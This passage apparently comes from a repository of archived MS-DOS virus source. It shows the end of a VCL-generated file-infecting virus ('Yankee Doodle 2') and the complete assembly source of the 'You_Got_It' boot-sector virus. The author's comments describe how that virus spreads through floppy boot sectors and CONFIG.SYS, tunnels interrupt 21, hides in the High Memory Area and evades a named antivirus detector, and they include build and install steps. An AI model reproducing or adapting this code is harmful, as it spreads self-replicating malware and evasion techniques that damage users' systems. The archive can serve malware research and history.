int 021h
mov ah,040h ; DOS write to file function
mov cx,finish - start ; CX holds virus length
lea dx,[di + start] ; DX points to start of virus
int 021h
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
get_hour proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,ch ; Copy hour into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_hour endp
data00 dw 262,6,262,6,293,6,329,6,262,6,329,6,293,6,196,6
dw 262,6,262,6,293,6,329,6,262,12,262,12
dw 262,6,262,6,293,6,329,6,349,6,329,6,293,6,262,6
dw 246,6,196,6,220,6,246,6,262,12,262,12
dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,6
dw 196,6,220,6,196,6,174,6,164,6,174,6,196,7
dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,7
dw 196,6,262,6,246,6,293,6,262,12,262,12
dw 0
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "[Yankee Doodle 2]",0
db "Nowhere Man, [NuKE] '92",0
finish label near
code ends
end main
MSDOS/Y-Index/Virus.MSDOS.Unknown.yanshort.asm
+1129
View File
File diff suppressed because it is too large Load Diff
MSDOS/Y-Index/Virus.MSDOS.Unknown.yd23.asm
+1818
View File
File diff suppressed because it is too large Load Diff
MSDOS/Y-Index/Virus.MSDOS.Unknown.yeah1.asm
+1050
View File
File diff suppressed because it is too large Load Diff
MSDOS/Y-Index/Virus.MSDOS.Unknown.yelet.asm
+1012
View File
File diff suppressed because it is too large Load Diff
MSDOS/Y-Index/Virus.MSDOS.Unknown.you_got_it.asm
+335
View File
@@ -0,0 +1,335 @@
comment *
Designed by "Q" the Misanthrope
The "You_Got_It" virus needed to be made. Windows 95 has neglected the
floppy boot sector virus long enough. Windows 95 in it's 32 bit protected
mode has it's own floppy disk routines and doesn't use int 13 or int 40
anymore. When a floppy boot sector viruses infectes the hard disk of the
Windows 95 computer, it would flag a change in the MBR or DBR indicating
a possible virus attack (not good). The conclusion, don't hook int 13, hook
int 21. Problem is, when Windows 95 starts up, it starts in DOS mode then
changes to it's protected mode DOS so int 21 hooked in DOS mode isn't hooked
anymore. Many of the multipatrite virii will not infect once Windows 95
starts. If your boot sector virus can infect a program called in your
AUTOEXEC.BAT or your CONFIG.SYS then the virus would go resident. The
"You_Got_it" virus does this. It creates a randomly named file and adds
INSTALLH=\AKYTHSQW (name is random) to the CONFIG.SYS file. Now when
Windows 95's int 21 is called to change the default drive to A: then the
infection occures. Cool features: during boot up the virus moves into video
memory then into the High Memory Area (HMA) when dos loads high. The virus
tunnels int 21 and loads in the HMA with dos. Also the boot sector infection
will not attack the CONFIG.SYS multiple times.
P.S. This virus will not be detected by Thunderbytes TBRESCUE Boot sector
detector or CMOS virus protection.
tasm yougotit /m2
tlink yougotit
exe2bin yougotit.exe yougotit.com
format a:/q/u
debug yougotit.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 13e,2ff 100
rcx
1c2
w
q
copy yougotit.com c:\
edit c:\config.sys
device=\yougotit.com
altf
x
y
*
.286
qseg segment byte public 'CODE'
assume cs:qseg,es:qseg,ss:nothing,ds:qseg
top: jmp short jmp_install ;boot sector data
db 90h
db 'MSDOS5.0'
dw 512
db 1
dw 1
db 2
dw 224
dw 2880
db 0F0h
dw 9
dw 18
dw 2
org 003eh
com_install proc near
jmp short go_mem_res
com_install endp
jmp_install proc near ;floppy boot up
push cs ;for the retf to 0000:7c00
id equ $+01h
mov si,7c00h ;7c00 is the infection marker
lea bx,word ptr ds:[si] ;bx=7c00
push bx ;for the retf to 0000:7c00
cld
push cs
mov es,bx ;if monochrome copy code to
pop ds ;7c00:7c00
cmp word ptr ds:[0449h],07h ;check if monochrome
je monochrome
push 0b700h ;lets reside in video memory
pop es ;no need for that TOM
cmp word ptr es:[si+id-top],si
monochrome: push es ;check if already mem resident
mov di,si ;di=7c00
mov cx,offset previous_hook ;copy loop varable
push cx ;save it because we will copy
push si ;the code twice to b700:7c00
rep movsb ;and b700:7dfe
pop si
pop cx
call return_far ;goto b700 segment of code
rep movsb ;continue copy to b700:7dfe
mov si,1ah*04h ;only hook int 1a
je already_res ;if already resident don't
movsw ;hook again
movsw
mov word ptr ds:[si-04h],offset interrupt_1a+7e00h-02h
mov word ptr ds:[si-02h],cs ;hook int 1a
already_res: push ds ;read moved floppy boot sector
pop es
mov ax,0201h
jmp_install endp
set_cx_dx proc near
mov bp,word ptr ds:[bx+11h] ;code to point to last sector
mov cx,word ptr ds:[bx+16h] ;of the root directory of any
shr bp,04h ;floppy disk
shl cx,01h
add cx,bp
inc cx
mov dh,01h
sub cx,word ptr ds:[bx+18h]
int 13h ;read or write boot sector
return_far: retf ;return to 7c00:0000 or
set_cx_dx endp ;resident_21 routine
config_line db "C:\CONFIG.SYS",00 ;file to infect
install_name db "INSTALL=" ;what to add
file_name db "\" ;random file name goes here
db 00h
crlf equ $+07h
go_mem_res proc near ;CONFIG.SYS residency
mov ax,3501h ;get int 1 address for tunnel
int 21h
mov dx,offset interrupt_1-com_install+100h
mov ah,25h ;set int 1 for tunnel
push es
int 21h
pop ds ;ds:dx will be to set it back
push 00h ;es=0000h
pop es
pushf ;simulate interrupt stack
lea dx,word ptr ds:[bx]
push cs
push es ;return to cs:0000 is cd 20
int 01h ;set trap flag
db 26h ;es: override in to int table
dw 02effh,21h*04h ;jmp far ptr es:[0084]
go_mem_res endp
interrupt_1 proc near ;set trap flag, trace int 21
pusha ;save varables
push sp
pop bp ;get pointer
push ds
push es
lds si,dword ptr ss:[bp+10h];get next instruction address
cmp word ptr ds:[si+01h],02effh
jne go_back ;check if jmp far ?s:[????]
cmp word ptr ds:[si-02h],001cdh
org $-02h ;see if called from my int 01
int 01h
je toggle_tf
mov si,word ptr ds:[si+03h] ;get address segment of jmp
cmp byte ptr ds:[si+03h],0f0h
jb go_back ;see if in HMA area
mov bx,((tail-com_install+10h)SHR 4)*10h
mov di,0ffffh ;allocate HMA area for virus
mov ax,4a02h
int 2fh
inc di ;is HMA full
jz toggle_tf ;if so then just don't bother
push si ;move the virus to the HMA
cld
mov cx,previous_hook-com_install
mov si,0100h ;copy virus to HMA
rep movs byte ptr es:[di],cs:[si]
pop si ;now hook the int 21 chain
movsw
movsw
lea di,word ptr ds:[di-(offset vbuffer-resident_21)]
mov word ptr ds:[si-04h],di ;point to resident 21 code
mov word ptr ds:[si-02h],es
toggle_tf: xor byte ptr ss:[bp+15h],01h;toggle the trap flag
go_back: pop es
pop ds
popa
iret
interrupt_1 endp
interrupt_21 proc near ;hooked in after int 1a sees
pushf ;that dos loaded during boot
pusha
push ds
push es
push cs
pop ds
xor ah,4bh ;unload if a program starts
jz set_21_back
mov ax,3d42h ;open c:\config.sys
mov dx,offset config_line+7e00h-02h
int 18h ;really it is int 21
mov bx,5700h ;get date
xchg ax,bx
jc retry_later ;unable to open c:\config.sys
int 18h
or cl,cl ;is c:\config.sys infected
jz close_it
pusha ;save file date
mov ah,5ah ;create random file
mov cx,0005h
mov dx,offset file_name+7e00h-02h
int 18h
mov dx,offset com_install+7c00h
mov bh,40h ;write virus code into file
xchg ax,bx
mov ch,02h
int 18h
mov ah,3eh ;close it
int 18h
popa ;date and handle c:\config.sys
inc ax ;set date
pusha ;save it for later
mov ax,4202h ;go to end of c:\config.sys
cwd
push dx
pop cx
int 18h
mov ah,40h ;write INSTALL=\ line
mov word ptr ds:[crlf+7e00h-02h],0a0dh
mov cl,low(crlf-install_name+02h)
mov dx,offset install_name+7e00h-02h
int 18h ;be sure to cr lf terminate it
popa ;get file date
shr cl,cl ;blitz seconds and more
int 18h
close_it: mov ah,3eh ;close c:\config.sys
int 18h
set_21_back: lds dx,dword ptr ds:[previous_hook+7c00h]
jmp short set_int_21 ;unhook it 21
retry_later: jmp short jmp_pop_it
interrupt_21 endp
interrupt_1a proc near ;hooked at boot and waits for
pushf ;dos to load
pusha
mov ax,1200h ;dos loaded
push ds
push es
cwd
int 2fh
inc al
jnz jmp_pop_it ;and unhook int 1a
mov ds,dx ;if loaded then hook int 21
mov si,21h*04h ;sorry for all the complexity
mov di,offset previous_hook+7c00h
les bx,dword ptr cs:[previous_hook+7e00h-02h]
mov ds:[si-((21h-1ah)*04h)+02h],es
mov ds:[si-((21h-1ah)*04h)],bx
les bx,dword ptr ds:[si]
mov ds:[si-((21h-18h)*04h)+02h],es
push cs ;also save int 21 into int 18
cld
mov ds:[si-((21h-18h)*04h)],bx
pop es
movsw
movsw
mov dx,offset interrupt_21+7c00h
push cs ;set int 21
pop ds
set_int_21: mov ax,2521h
int 18h
jmp_pop_it: jmp short pop_it
interrupt_1a endp
org 001b4h
resident_21 proc near ;memory resident int 21
pushf ;called when loaded from
pusha ;config.sys
push ds
push es
cmp ah,0eh ;is it set drive
jne pop_it
or dl,dl ;drive A:
jnz pop_it
cwd ;set varables to read sector
call next_line
next_line: pop bx
add bx,offset vbuffer-next_line
push cs
mov cx,0001h
pop es
push cs
mov ax,0201h ;try reading the boot sector
pop ds
int 13h
jc pop_it ;if not don't infect
cmp byte ptr ds:[bx+id-top+01h],7ch
je pop_it ;check if infected
mov ax,0301h ;move and write boot sector
pusha ;save for later
push cs ;for far retf
call set_cx_dx
cld
mov cx,previous_hook-com_install
lea si,word ptr ds:[bx-offset (vbuffer-com_install)]
lea di,word ptr ds:[bx+com_install-top]
rep movsb
mov word ptr ds:[bx],0000h
org $-02h
jmp $(jmp_install-top) ;place initial jmp at front
popa
int 13h ;write it
pop_it: pop es
pop ds
popa
popf
resident_21 endp
org 001fdh
far_jmp proc near
db 0eah ;jmp to old int 1a or boot
previous_hook: label double ;up int 21 or resident int 21
far_jmp endp
boot_signature dw 0aa55h ;guess what
org $+02h
vbuffer label byte ;buffer to read boot sector
org $+0202h ;the end of the code
tail label byte
qseg ends
end